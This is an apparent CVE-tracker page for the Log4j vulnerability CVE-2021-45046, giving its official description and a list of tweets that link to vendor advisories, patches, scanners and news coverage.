CVE STALKER

CVE-2021-45046

CVSS3
DESCRIPTIONIt was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
HEAT SCORE5206

WORDS

TWEETS

DATE TWEETS USER
2022-12-18 14:33:57CVE-2021-44228の修正が不完全でCVE-2021-45046が発行されるなど。 https://t.co/2zVvePdlpK ※去年の今頃 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/soc127_0_0_1
2022-12-18 14:10:35https://t.co/2zVvePdlpK JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/soc127_0_0_1
2022-12-16 00:30:15JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能(2021) https://t.co/MduK7nb4H0 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/gigazine
2022-12-06 20:33:09Log4Shell (CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105) es una vulnerabilidad de ejecución remota de código (RC… https://t.co/w57sR5SlCE https://twitter.com/i/web/status/1600226094803980288CycuraMX
2022-11-22 14:51:16“Log4Shell” (CVE-2021-44228, CVE-2021-45046 e correlate): secondo alert @csirt_it nel giro di circa 4 mesi. 🔹… https://t.co/YLDMzYmaYj https://twitter.com/i/web/status/1595066328460972034sonoclaudio
2022-11-21 20:16:20Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) Read full article -… https://t.co/GCSmbj21bk https://twitter.com/i/web/status/1594782801743982592adityagauravkc
2022-10-19 00:06:27*UPDATED* VMWare vCenter Log4J Workaround | VMSA-2021-0028 | CVE-2021-45046 | KB87081 #cybersecurity #vmware… https://t.co/raykHdyZ0p https://twitter.com/i/web/status/1582518160791457796sebaenetworks
2022-10-17 21:35:42*UPDATED* VMWare vCenter Log4J Workaround | VMSA-2021-0028 | CVE-2021-45046 | KB87081 #cybersecurity #vmware… https://t.co/krEvjSVSKa https://twitter.com/i/web/status/1582118022290247681sebaenetworks
2022-10-06 03:29:54🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/0SZSxVtKqp https://twitter.com/i/web/status/1577859233072271364threatintelctr
2022-09-07 16:31:24@LiveOverflow @0xdade I put out novel information during the height of the log4j event on CVE-2021-45046 and how it… https://t.co/v9bMRu94bc https://twitter.com/i/web/status/1567549860836175873d0nutptr
2022-08-29 14:51:31🚨 NEW: CVE-2021-4125 🚨 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenSh… https://t.co/ykLlA9eWM8 https://twitter.com/i/web/status/1564262133386383361threatintelctr
2022-08-25 07:21:16CVE-2021-4125 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift meter… https://t.co/tySaKr42fU https://twitter.com/i/web/status/1562698691332689920threatmeter
2022-08-25 07:17:09Emerging Vulnerability Found CVE-2021-45046 - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2… https://t.co/rAKiPyQdE4 https://twitter.com/i/web/status/1562698720977641472ColorTokensInc
2022-08-24 17:51:03CVE-2021-4125 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift meter… https://t.co/Ota4hXdT39 https://twitter.com/i/web/status/1562496297088610304CVEnew
2022-08-24 17:22:26🚨 NEW: CVE-2021-4125 🚨 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenSh… https://t.co/r3DBYdUeZj https://twitter.com/i/web/status/1562487941636599808threatintelctr
2022-08-24 17:00:37🚨 NEW: CVE-2021-4125 🚨 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenSh… https://t.co/FbxzPkKkXt https://twitter.com/i/web/status/1562480391545831425threatintelctr
2022-08-24 16:35:01CVE-2021-4125 : It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift met… https://t.co/oIdchNpYt4 https://twitter.com/i/web/status/1562472313375059970CVEreport
2022-08-22 22:30:05Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) #pentest #infosec… https://t.co/RZIzlDOLHn https://twitter.com/i/web/status/1561842855639142401beingsheerazali
2022-08-21 09:40:12Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) #pentest #infosec… https://t.co/AilRaKp9TB https://twitter.com/i/web/status/1561286240464506880CyberWarship
2022-08-14 06:40:04I really had CVE-2021-45105, CVE-2021-45046 and CVE-2021-44228 🤑 #Log4ShellIog4j
2022-08-09 08:50:56An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/StXBpL7dpT https://twitter.com/i/web/status/1556925339758215168ProductCERT
2022-07-13 19:10:32URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/GL8uUtQgxZ https://twitter.com/i/web/status/1547295144302546950doukkalli
2022-06-14 09:00:24An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/rIY8FUEtoY https://twitter.com/i/web/status/1536633569585635328ProductCERT
2022-05-24 04:10:43*UPDATED* VMWare vCenter Log4J Workaround | VMSA-2021-0028 | CVE-2021-45046 | KB87081 #cybersecurity #vmware… https://t.co/kM0OraEW7s https://twitter.com/i/web/status/1528948924148498433sebaenetworks
2022-05-24 00:20:13*UPDATED* VMWare vCenter Log4J Workaround | VMSA-2021-0028 | CVE-2021-45046 | KB87081 #cybersecurity #vmware… https://t.co/aatA2bh7Ar https://twitter.com/i/web/status/1528892685481922560sebaenetworks
2022-05-21 16:10:45performing remote code execution in Apache Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104). This attack can b… https://t.co/fwcOcmpjmf https://twitter.com/i/web/status/1528043076219977729KiaSoroosh
2022-05-10 09:40:11An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/OQdkebyokf https://twitter.com/i/web/status/1523961018178752513ProductCERT
2022-05-02 11:50:11CyberSec News: Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) | Lun… https://t.co/ihPA2qV5dD https://twitter.com/i/web/status/1521093321090863107Scott_London
2022-05-02 07:50:05#Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) #Security #0day… https://t.co/5Pl3q35rrw https://twitter.com/i/web/status/15210340375146741773ackd0or
2022-05-01 13:50:17Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) #pentest #infosec… https://t.co/BizJOZ9UYJ https://twitter.com/i/web/status/1520760481845153798beingsheerazali
2022-05-01 13:30:06Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) #pentest #infosec… https://t.co/hgQLrAK0Kw https://twitter.com/i/web/status/1520756937209618434CyberWarship
2022-04-12 08:40:30An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/qWZeK9R2jd https://twitter.com/i/web/status/1513797596401254404ProductCERT
2022-03-09 15:05:23CVE-2021-45046 é sem dúvidas a minha vulnerabilidade favoritajaumdelavie_old
2022-03-08 11:21:51An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/oMtyn50FFo https://twitter.com/i/web/status/1501155177277145089ProductCERT
2022-03-01 00:18:21Spectrum Addressing for Big Data - Log4J - CVE-2021-44228, CVE-2021-45046, CVE-2021-45105: Remediation. After extra… https://t.co/T9YgKaVYpp https://twitter.com/i/web/status/1498448018994958337SuriyaSubraman
2022-02-23 15:20:08Learn more about vCenter Server CVE-2021-44228 and the CVE-2021-45046 workaround on the latest vCommunity podcast f… https://t.co/RhvB3xhUJN https://twitter.com/i/web/status/1496504550416695297PiotrTarnawski
2022-02-23 14:00:21Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 342.8K (audience size) CVE-2021-45046: 339.9K CVE-2022… https://t.co/IegLrW0biW https://twitter.com/i/web/status/1496485000702836739CVEtrends
2022-02-22 15:50:25Learn more about vCenter Server CVE-2021-44228 and the CVE-2021-45046 workaround on the latest vCommunity podcast f… https://t.co/XqxJjuk36v https://twitter.com/i/web/status/1496147782868078597VMware
2022-02-19 16:56:03🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/Bcyg3VuVI8 https://twitter.com/i/web/status/1495076518560739332threatintelctr
2022-02-19 14:10:46Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-1965: 414.6K (audience size) CVE-2021-45046: 338K CVE-2021-44… https://t.co/aef6lFlnt5 https://twitter.com/i/web/status/1495035450129629185CVEtrends
2022-02-19 05:00:21🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/ygohykgB2e https://twitter.com/i/web/status/1494895323998732289threatintelctr
2022-02-19 04:50:30Learn more about vCenter Server CVE-2021-44228 and the CVE-2021-45046 workaround on the latest vCommunity podcast f… https://t.co/fBSGpaGrmf https://twitter.com/i/web/status/1494897036222681091VMware
2022-02-18 23:11:26CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2022-02-18 09:53:51vSphere 製品でよく参照される KBTop5をご紹介致します。 Top1 は、 Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in… https://t.co/fjkY3L9ggX https://twitter.com/i/web/status/1494597674003275780VMware_Japan
2022-02-18 08:48:08CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/Q5OVh0XZBc https://dy.si/XvFkXCloudITBlog
2022-02-18 05:13:01CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/Gh5rNfIE2l https://dy.si/3rSiFP2RandhirChaubey
2022-02-18 05:12:33CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/cuYU449id2 https://dy.si/ZdHkW3RandhirChaubey
2022-02-18 05:12:04CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/d1JYD5f4IY https://dy.si/y364MRandhirChaubey
2022-02-18 05:11:36CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/g7NpRZmcZo https://dy.si/MbwitKRandhirChaubey
2022-02-18 05:11:09CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/pxYjMFEbM4 https://dy.si/7kJSWRandhirChaubey
2022-02-17 22:23:44CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/WH1iaxLqjz https://dy.si/3t1EoJjasonahutson
2022-02-17 18:41:33CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/3nr3IXtHmj https://dy.si/HF2Q9ocjknoch
2022-02-17 17:00:14CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/I19MIdOjOW https://dy.si/DMasNtPhotoZel
2022-02-17 05:40:24CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/HyxAugKloV https://dy.si/HD9NVukbordez
2022-02-17 03:50:05CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/mNomDEneix https://dy.si/sYBhYazaelcolon
2022-02-11 14:55:20Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) #infosec #pentest… https://t.co/tTNbmc6dgU https://twitter.com/i/web/status/1492146418827550720CyberWarship
2022-02-09 07:01:14Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046) - Impact to Siemens Products https://t.co/4jcykyCAr8 https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfsmh67dmrc
2022-02-08 19:20:36今日リリースされた vCenter 6.5U3s, 6.7U3q と先日リリースされた 7.0U3c をもって、Log4j の脆弱性 (VMSA-2021-0028 / CVE-2021-44228, CVE-2021-45046… https://t.co/ioWOKZa3oj https://twitter.com/i/web/status/1491127784085008384makopicut
2022-02-08 11:01:53An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/aYYvjaPz26 https://twitter.com/i/web/status/1491001853890359299ProductCERT
2022-02-08 11:01:12An advisory has been updated: "SSA-714170: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/D601b4mfJO https://twitter.com/i/web/status/1491002055829299206ProductCERT
2022-02-08 09:01:27🔴APACHE🔴 Múltiples vulnerabilidades de severidad alta en productos APACHE: CVE-2021-45046,CVE-2021-44224,CVE-2021… https://t.co/t4bPg4VLfQ https://twitter.com/i/web/status/1490972578801983491GrupoICA_Ciber
2022-02-08 09:00:43🔴DEBIAN🔴 Múltiples vulnerabilidades de severidad alta en productos DEBIAN: CVE-2021-45079,CVE-2021-45046 Más inf… https://t.co/vtoriZIcSH https://twitter.com/i/web/status/1490973220467527682GrupoICA_Ciber
2022-02-07 18:11:50Log4j - CVE-2021-45046: https://t.co/05CDFxb8Dq http://www.openwall.com/lists/oss-security/2021/12/14/4LinInfoSec
2022-02-05 09:00:18Fuzzing Java to Find Log4j Vulnerability - CVE-2021-45046 https://t.co/oXQmiLC1ff @YouTubeより https://youtu.be/kvREvOvSWt4eusuke
2022-02-03 13:50:33K32171392: Apache Log4j2 vulnerability CVE-2021-45046 https://t.co/lgqHOP7LRC http://www.ccn-cert.cni.es/component/vulnerabilidades/view/33075.htmlSombreroBlanc0
2022-02-02 11:20:39Forwarded from Hacker Videos Fuzzing Java to Find Log4j Vulnerability - CVE-2021-45046 https://t.co/iMxoTZNInM F… https://t.co/Aty2c5ffUn https://www.youtube.com/watch?v=kvREvOvSWt4 https://twitter.com/i/web/status/1488833007737782273PentestingN
2022-02-02 03:50:43“Fuzzing Java to Find Log4j Vulnerability - CVE-2021-45046”https://t.co/lewKgD4mnL via @LiveOverflow these videos are mint https://youtu.be/kvREvOvSWt4anthonypjshaw
2022-02-01 17:44:45Fuzzing Java To Find Log4j Vulnerability - CVE-2021-45046 #Hacking #PenTest https://t.co/8pF5CisagO https://t.co/j8CVcJSvQ1 https://ift.tt/3zmFopP1uhack_videos
2022-01-29 12:41:55VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046)… https://t.co/wqfux4SpTL https://twitter.com/i/web/status/1487404223478345731samilaiho
2022-01-28 20:00:25An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/B93GEkyjvJ https://twitter.com/i/web/status/1487151204262100992ProductCERT
2022-01-26 20:30:46VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046) VMSA-202… https://t.co/2Z7PwltgYA https://twitter.com/i/web/status/1486435268957716482msolde
2022-01-23 08:30:52Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/BJtc7rce9X #cybersecurity https://bit.ly/3pXwuNnsmargasy
2022-01-20 20:42:22@buherator None of these are for CVE-2021-44228 or CVE-2021-45046. It just says "this patch also addresses vulnerab… https://t.co/ZgN8jEk0Tu https://twitter.com/i/web/status/1484262328761823241cybermindy
2022-01-20 18:11:07✅RP 5.6.3 released: Log4J vulnerabilities CVE-2021-44832, CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 address… https://t.co/EjgIx6iSYm https://twitter.com/i/web/status/1484225602043400194ReportPortal_io
2022-01-20 14:50:17Google Cloud IDS signature updates help detect Apache Log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-202… https://t.co/95Ze7mZyK2 https://twitter.com/i/web/status/1484175653247193094webAnalyste
2022-01-20 00:20:28… The Log4j vulnerability (CVE-2021-44228, CVE-2021-45046) is a critical vulnerability (CVSS 3.1 base [...] [2/2]AWSBlogs
2022-01-19 14:50:11This week's catchiest title award goes to @TenableSecurity: CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequent… https://t.co/yoMELr7kXG https://twitter.com/i/web/status/1483812640048746496cryptorobert
2022-01-19 06:12:03IT Risk: Oracle.Multiple vulnerabilities in Retail Applications -2/2 CVE-2021-45105 CVE-2021-45046 CVE-2021-44832 C… https://t.co/nQwkH2pvNt https://twitter.com/i/web/status/1483681684415746052management_sun
2022-01-18 21:40:10Evening Everyone, with log4j issues (CVE-2021-45046 ) we have just finished upgrading the Controller to the latest… https://t.co/zDHHDXv06X https://twitter.com/i/web/status/1483554788755312640AMLMidlandsLtd
2022-01-18 15:20:37https://t.co/QQUBQWHk91 Log4j: The Evolution of Vulnerabilities to CVE-2021-45046 and What to Expect in 2022 #cybersecurity https://cloudsecurityalliance.org/articles/log4j-the-evolution-of-vulnerabilities-to-cve-2021-45046-and-what-to-expect-in-2022/netsecu
2022-01-18 14:40:35Log4j: The Evolution of Vulnerabilities to CVE-2021-45046 and What to Expect in 2022 https://t.co/gPSjn8EGDg https://t.co/uhr9FC3E16 http://dlvr.it/SHLXJ2cloudplaninc
2022-01-18 14:11:02Log4j: The Evolution of Vulnerabilities to CVE-2021-45046 and What to Expect in 2022 https://t.co/DYWjIelnae https://t.co/Y0YrnQmif3 https://cloudsecurityalliance.org/articles/log4j-the-evolution-of-vulnerabilities-to-cve-2021-45046-and-what-to-expect-in-2022/?utm_source=dlvr.it&utm_medium=twitterRigneySec
2022-01-18 14:10:12Log4j: The Evolution of Vulnerabilities to CVE-2021-45046 and What to Expect in 2022: This blog was originally publ… https://t.co/UTu8ipKHz5 https://twitter.com/i/web/status/1483440813413601281DTS_Solution
2022-01-18 08:14:02"Hibernate projects are not affected by the vulnerabilities behind CVE-2021-45046 and CVE-2021-44228: none of the H… https://t.co/1pV57p4ozt https://twitter.com/i/web/status/1483348800680960006SamProgramiz
2022-01-18 05:50:58[GCP Blog] Google Cloud IDS のシグネチャの更新による Apache Log4j の脆弱性 CVE-2021-44228、CVE-2021-45046、CVE-2021-4104、CVE-2021-451… https://t.co/YTbwA4HVaO https://twitter.com/i/web/status/1483315309465505796saitoyasuyuki
2022-01-18 05:21:43Cloud Blog JA | Google Cloud IDS のシグネチャの更新による Apache Log4j の脆弱性 CVE-2021-44228、CVE-2021-45046、CVE-2021-4104、CVE-202… https://t.co/t5GTqZqP0b https://twitter.com/i/web/status/1483306270383906817MKURIB
2022-01-18 05:20:35Google Cloud IDS のシグネチャの更新による Apache Log4j の脆弱性 CVE-2021-44228、CVE-2021-45046、CVE-2021-4104、CVE-2021-45105、CVE-2021… https://t.co/VX8nUIg6gh https://twitter.com/i/web/status/1483307993034899460kaz_goto
2022-01-17 22:10:09An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/JHSPSwMTui https://twitter.com/i/web/status/1483198670136877062ProductCERT
2022-01-16 18:40:10This can summarize the weekend so far… #CVE-2021-44228 #CVE-2021-45046 https://t.co/JTNB1lfHjF https://t.co/sjal4oltkX https://twitter.com/kostastsale/status/1482114686388621313Kostastsale
2022-01-13 22:20:29#HCL #Knowledgebase CVE-2021-44228 + CVE-2021-45046 + CVE-2021-45105 + CVE-2021-44832 + CVE-2021-4104, Log4J / Log4… https://t.co/BJw9XiuFG7 https://twitter.com/i/web/status/1481752885293731841domino_robot
2022-01-13 15:21:15CISA released its own Log4J scanner to provide a solution for CVE-2021-44228 and CVE-2021-45046. Check out the fu… https://t.co/kb4lZyXoNF https://twitter.com/i/web/status/1481644716487700492McAfee_ATR
2022-01-13 15:00:53Escanee aplicaciones en busca de vulnerabilidades #log4j CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105 con la cap… https://t.co/3EWsJazjDs https://twitter.com/i/web/status/1481637229994799111a190468
2022-01-13 08:52:46Escanee aplicaciones en busca de vulnerabilidades #log4j CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105 con la cap… https://t.co/myCjhYdQUG https://twitter.com/i/web/status/1481547097690230784FranciscoJCarb1
2022-01-12 18:00:09Escanee aplicaciones en busca de vulnerabilidades #log4j CVE-2021-44228, CVE-2021-45046 y CVE-2021-45105 con la cap… https://t.co/8q5xx8NXZk https://twitter.com/i/web/status/1481325101853384705HCLSoftware
2022-01-12 17:00:07Сканируйте приложения на наличие уязвимости #log4j CVE-2021-44228, CVE-2021-45046, & CVE-2021-45105 при помощи HCL… https://t.co/Da6uw7X3sK https://twitter.com/i/web/status/1481310006343454721HCLSoftware
2022-01-11 21:01:23Scan applications #log4j vulnerabilities #cve CVE-2021-44228, CVE-2021-45046, & CVE-2021-45105 #hclswlobp… https://t.co/Q7o7QCpzfY https://twitter.com/i/web/status/1481006730477805580FraCurzi
2022-01-11 20:30:05Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, & CVE-2021-45105 with HCL AppScan's Op… https://t.co/qA8GsEfkvC https://twitter.com/i/web/status/1481000095034351620stefanopog
2022-01-11 16:42:17Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, & CVE-2021-45105 with HCL AppScan's Op… https://t.co/8JMRGGCbxA https://twitter.com/i/web/status/1480940204160659462a190468
2022-01-11 11:01:26Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/seOKdiHl00 https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/reverseame
2022-01-10 13:30:07Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, & CVE-2021-45105 with HCL AppScan's Op… https://t.co/zbWWNIYUIu https://twitter.com/i/web/status/1480530495289151499bale1966
2022-01-10 08:00:14Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, & CVE-2021-45105 with HCL AppScan's Op… https://t.co/BpqLsxa1dE https://twitter.com/i/web/status/1480447925679448067FranciscoJCarb1
2022-01-09 06:30:13Python Module To Scan Log4j RCE (CVE-2021-44228, CVE-2021-45046), 30 Obuscated WAF Payloads, MultiThreaded & Reliab… https://t.co/WZjEldWxJP https://twitter.com/i/web/status/1480063508423143425PushpenderIndia
2022-01-09 05:40:05What you need to know about Apache Log4J CVE-2021-44228 & CVE-2021-45046 #vmware #apache #log4j #cve #security #vmsa https://t.co/DhSAblrxlm https://dy.si/76fSea_masoudifard
2022-01-09 04:10:10Guide: How To #Detect and #Mitigate the #Log4Shell #Vulnerability (CVE-2021-44228/CVE-2021-45046) https://t.co/HwxDX3Pz99 https://vapt.me/Log4JMitigationomvapt
2022-01-07 15:00:04Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, & CVE-2021-45105 with HCL AppScan's Op… https://t.co/KkwFENHeMO https://twitter.com/i/web/status/1479467866470690822HCLSoftware
2022-01-06 02:40:15「CVE-2021-44228」が「Log4Shell」と呼ばれているのは知っていますが…、 "Log4j 2に報告されている一連の脆弱性(CVE-2021-44228、CVE-2021-45046、CVE-2021-44832… https://t.co/xfFYDmXVB6 https://twitter.com/i/web/status/1478918408624549888VELO_ch
2022-01-05 22:50:04An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/4OQuhS0BZi https://twitter.com/i/web/status/1478861153912733701ProductCERT
2022-01-05 17:10:11Vulnerability Log4j (CVE-2021-45046): nueva corrección publicada - https://t.co/5cd9itFejI https://t.co/BZ1lOYPg8i https://cursohacker.es/vulnerability-log4j-%28cve-2021-45046%29%3A-nueva-correcci%C3%B3n-publicada/cursohacker_es
2022-01-05 14:40:04Update for advisory OBS02112-01 published: Updates for impact of CVE-2021-45046,CVE-2021-45105UnifyCoSecurity
2022-01-05 07:50:36IT Risk: Apache.Multiple vulnerabilities in log4j2 (UPDATE) -2/2 CVE-2021-45105 CVE-2021-45046 CVE-2021-44832 CVE-2021-44228 CVE-2021-4104management_sun
2022-01-05 07:40:09IT Risk: Apache.log4j2に複数の脆弱性(UPDATE) -2/2 CVE-2021-45105 CVE-2021-45046 CVE-2021-44832 CVE-2021-44228 CVE-2021-4104management_sun
2022-01-02 12:22:03Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) #infosec… https://t.co/dAsLHIYY0a https://twitter.com/i/web/status/1477613671081598977beingsheerazali
2022-01-02 11:10:32Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) #infosec… https://t.co/n2Y9nNS9kj https://twitter.com/i/web/status/1477596092590014465beingsheerazali
2022-01-02 10:40:22Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) #infosec #pentest… https://t.co/4GOwcurwMC https://twitter.com/i/web/status/1477589749963673600CyberWarship
2021-12-31 16:10:48Arctic Wolf's #Log4Shell Deep Scan Tool can enable detection of both CVE-2021-45046 and CVE-2021-44228 within nest… https://t.co/wN66a6s4yq https://twitter.com/i/web/status/1476946278177247236ReaganMcafee
2021-12-30 21:20:05#HCL #Knowledgebase CVE-2021-44228 + CVE-2021-45046 + CVE-2021-45105 + CVE-2021-44832, Log4J 2 / Log4Shell Security… https://t.co/vl7qjRZXIF https://twitter.com/i/web/status/1476664181860483080domino_robot
2021-12-30 16:40:13En la nota de hoy te contamos de qué se trata la vulnerabilidad CVE-2021-45046 del log4j para usuarios de servidore… https://t.co/7ucfqvKAJl https://twitter.com/i/web/status/1476592906429419525BAEHOST
2021-12-30 15:11:13CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-30 13:00:43We've developed a Burp plugin to detect log4j vulnerabilities (CVE-2021-44228 / CVE-2021-45046) on scale. It suppor… https://t.co/KilMIg0D9b https://twitter.com/i/web/status/1476536672892379137ysecurityde
2021-12-30 11:00:33log4j-detector v2021.12.29 releases: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your fil… https://t.co/xGteVgCsgP https://twitter.com/i/web/status/1476507629836984322the_yellow_fall
2021-12-30 10:20:51@RigneySec Intel® Product Advisory for Apache Log4j2 Vulnerabilities (CVE-2021-44228 & CVE-2021-45046) https://t.co/nzruwHJ5wp https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html42Sz40
2021-12-30 10:20:32@AddressIntel Intel® Product Advisory for Apache Log4j2 Vulnerabilities (CVE-2021-44228 & CVE-2021-45046) https://t.co/nzruwHJ5wp https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html42Sz40
2021-12-29 21:20:16Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-29 19:20:15Quick reference for #Log4Shell CVE-2021-44228: The OG RCE: fixed-ish 2.15.0 CVE-2021-45046: RCE: fixed 2.16.0 CVE-… https://t.co/sNU8BnsHlM https://twitter.com/i/web/status/1476269853388464134ksigler
2021-12-29 16:40:03Listado de CVE: CVE-2021-44228 CVE-2021-45046 CVE-2021-45105orvotron
2021-12-29 13:01:23Log4j 又有新的 RCE 漏洞 加上之前的兩個: CVE-2021-44228 CVE-2021-45046 這個 CVE-2021-44832 已經是第三個 有在用的人要記得升級到以下其中一個版本 - 2.17.1… https://t.co/9Nis8beMiY https://twitter.com/i/web/status/1476174217695547392M157q
2021-12-29 08:40:24🏴‍☠️ La saga #Log4j continue après CVE-2021-45105, CVE-2021-45046 CVE-2021-44228 voici CVE-2021-44832. Ce RCE est c… https://t.co/SNE8CbTMK6 https://twitter.com/i/web/status/1476110714460946433JMousqueton
2021-12-29 06:12:13CVE-2021-44228 Impact of Log4j Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CV.. -… https://t.co/zJivEoE6kb https://twitter.com/i/web/status/1476071810563198976CisoInvisible
2021-12-29 03:22:21Apache Log4j多个高危漏洞(CVE-2021-44228/CVE-2021-4104/CVE-2021-45046/CVE-2021-45105/ CVE-2021-44832)处置手册… https://t.co/KRdS7el5sf https://twitter.com/i/web/status/1476028120683663361buaqbot
2021-12-29 02:30:37Apache Log4j多个高危漏洞(CVE-2021-44228/CVE-2021-4104/CVE-2021-45046/CVE-2021-45105/ CVE-2021-44832)处置手册… https://t.co/TzOFQTnEWM https://twitter.com/i/web/status/1476013588741566469buaqbot
